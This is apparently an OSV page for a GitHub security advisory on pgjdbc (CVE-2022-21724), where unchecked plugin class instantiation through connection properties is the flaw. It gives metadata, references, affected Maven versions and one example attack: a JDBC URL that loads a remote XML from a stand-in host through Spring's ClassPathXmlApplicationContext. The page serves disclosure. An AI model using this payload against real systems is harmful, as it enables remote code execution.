GHSA-v7wg-cpwc-24m4
Suggest an improvement- Source
- https://github.com/advisories/GHSA-v7wg-cpwc-24m4
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v7wg-cpwc-24m4/GHSA-v7wg-cpwc-24m4.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-v7wg-cpwc-24m4
- Aliases
- Downstream
- Related
- Published
- 2022-02-02T00:04:20Z
- Modified
- 2024-10-15T05:42:14.890292Z
- Severity
-
- 7.0 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
- Details
-
Impact
pgjdbc instantiates plugin instances based on class names provided via
authenticationPluginClassName,sslhostnameverifier,socketFactory,sslfactory,sslpasswordcallbackconnection properties.However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");The first impacted version is REL9.4.1208 (it introduced
socketFactoryconnection property) - Database specific
{ "nvd_published_at": "2022-02-02T12:15:00Z", "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-02-01T22:40:00Z", "cwe_ids": [ "CWE-665", "CWE-668", "CWE-74" ] }- References
-
- https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
- https://nvd.nist.gov/vuln/detail/CVE-2022-21724
- https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
- https://github.com/pgjdbc/pgjdbc
- https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS
- https://security.netapp.com/advisory/ntap-20220311-0005
- https://www.debian.org/security/2022/dsa-5196
Affected packages
Maven / org.postgresql:postgresql
Package
- Name
- org.postgresql:postgresql
- View open source insights on deps.dev
- Purl
- pkg:maven/org.postgresql/postgresql
Affected versions
9.*
9.4.1208
9.4.1208.jre6
9.4.1208.jre7
9.4.1209
9.4.1209.jre6
9.4.1209.jre7
9.4.1210
9.4.1210.jre6
9.4.1210.jre7
9.4.1211
9.4.1211.jre6
9.4.1211.jre7
9.4.1212
9.4.1212.jre6
9.4.1212.jre7
42.*
42.0.0
42.0.0.jre6
42.0.0.jre7
42.1.0
42.1.0.jre7
42.1.1
42.1.1.jre6
42.1.1.jre7
42.1.2
42.1.2.jre6
42.1.2.jre7
42.1.3
42.1.3.jre6
42.1.3.jre7
42.1.4
42.1.4.jre6
42.1.4.jre7
42.2.0
42.2.0.jre6
42.2.0.jre7
42.2.1
42.2.1.jre6
42.2.1.jre7
42.2.2
42.2.2.jre6
42.2.2.jre7
42.2.3
42.2.3.jre6
42.2.3.jre7
42.2.4
42.2.4.jre6
42.2.4.jre7
42.2.5
42.2.5.jre6
42.2.5.jre7
42.2.6
42.2.6.jre6
42.2.6.jre7
42.2.7
42.2.7.jre6
42.2.7.jre7
42.2.8
42.2.8.jre6
42.2.8.jre7
42.2.9
42.2.9.jre6
42.2.9.jre7
42.2.10
42.2.10.jre6
42.2.10.jre7
42.2.11
42.2.11.jre6
42.2.11.jre7
42.2.12
42.2.12.jre6
42.2.12.jre7
42.2.13
42.2.13.jre6
42.2.13.jre7
42.2.14
42.2.14.jre6
42.2.14.jre7
42.2.15
42.2.15.jre6
42.2.15.jre7
42.2.16
42.2.16.jre6
42.2.16.jre7
42.2.17
42.2.17.jre6
42.2.17.jre7
42.2.18
42.2.18.jre6
42.2.18.jre7
42.2.19
42.2.19.jre6
42.2.19.jre7
42.2.20
42.2.20.jre6
42.2.20.jre7
42.2.21
42.2.21.jre6
42.2.21.jre7
42.2.22
42.2.22.jre6
42.2.22.jre7
42.2.23
42.2.23.jre6
42.2.23.jre7
42.2.24
42.2.24.jre6
42.2.24.jre7
Maven / org.postgresql:postgresql
Package
- Name
- org.postgresql:postgresql
- View open source insights on deps.dev
- Purl
- pkg:maven/org.postgresql/postgresql